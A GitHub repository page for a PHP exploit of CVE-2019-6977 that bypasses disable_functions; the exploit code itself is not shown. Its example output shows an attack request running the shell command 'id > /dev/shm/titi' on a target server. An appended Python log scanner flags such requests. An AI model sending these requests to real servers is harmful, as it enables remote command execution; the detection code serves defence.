real and real Added example output
Latest commit c49da33 Feb 27, 2019
README.md Added example output Feb 27, 2019
exploit.php CVE-2019-6977-imagecolormatch: Created an exploit. Feb 27, 2019

README.md

imagecolormatch() OOB Heap Write exploit

Info

My binary exploit for CVE-2019-6977. Bug found by Simon Scannell from RIPS.

PHP bug is here. Helps you bypass PHP's disable_functions INI directive.

I commented a lot to help people that are new to binary PHP exploitation. Hope this helps.

Output

GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8

Exploit SUCCESSFUL !
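
A defender-side check built from the request shape shown in the output above (an added example, not part of the original repository): it scans web access logs for requests that carry both a 64-bit pointer-looking hex value and a parameter that decodes to shell syntax. The log lines are constructed, and the two regex heuristics and the function name `suspicious_requests` are assumptions; parameter names are deliberately not relied on, since they are trivial to change.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); not from the original page.
SAMPLE_LOG = '''\
203.0.113.7 - - [27/Feb/2019:10:00:01 +0000] "GET /exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi HTTP/1.1" 200 212 "-" "curl/7.64.0"
198.51.100.4 - - [27/Feb/2019:10:02:13 +0000] "GET /upload/x.php?a=0x7fe83d1bb480&b=id+%3E+/dev/shm/titi HTTP/1.1" 200 212 "-" "curl/7.64.0"
203.0.113.9 - - [27/Feb/2019:10:03:40 +0000] "GET /img.php?color=0xff8800&w=200 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Feb/2019:10:04:02 +0000] "GET /api.php?trace=0x00007ffdeadbeef0 HTTP/1.1" 200 64 "-" "Mozilla/5.0"
'''

# Request target inside the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a hex literal wider than 32 bits is treated as a process address.
POINTER_RE = re.compile(r"^0x[0-9a-fA-F]{9,16}$")
# Assumption: shell metacharacters or world-writable paths mark a command string.
SHELL_RE = re.compile(r"[;|&<>`$]|/dev/shm/|/tmp/")


def suspicious_requests(log_text):
    """Return (client_ip, path, decoded_command) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl decodes both '+' and %XX, so raw and encoded forms compare equal.
        params = parse_qsl(url.query, keep_blank_values=True)
        has_pointer = any(POINTER_RE.match(value) for _, value in params)
        commands = [value for _, value in params if SHELL_RE.search(value)]
        # Require both signals together: either one alone is common in benign traffic.
        if has_pointer and commands:
            hits.append((line.split()[0], url.path, commands[0]))
    return hits


if __name__ == "__main__":
    for ip, path, command in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} -> {command!r}")
```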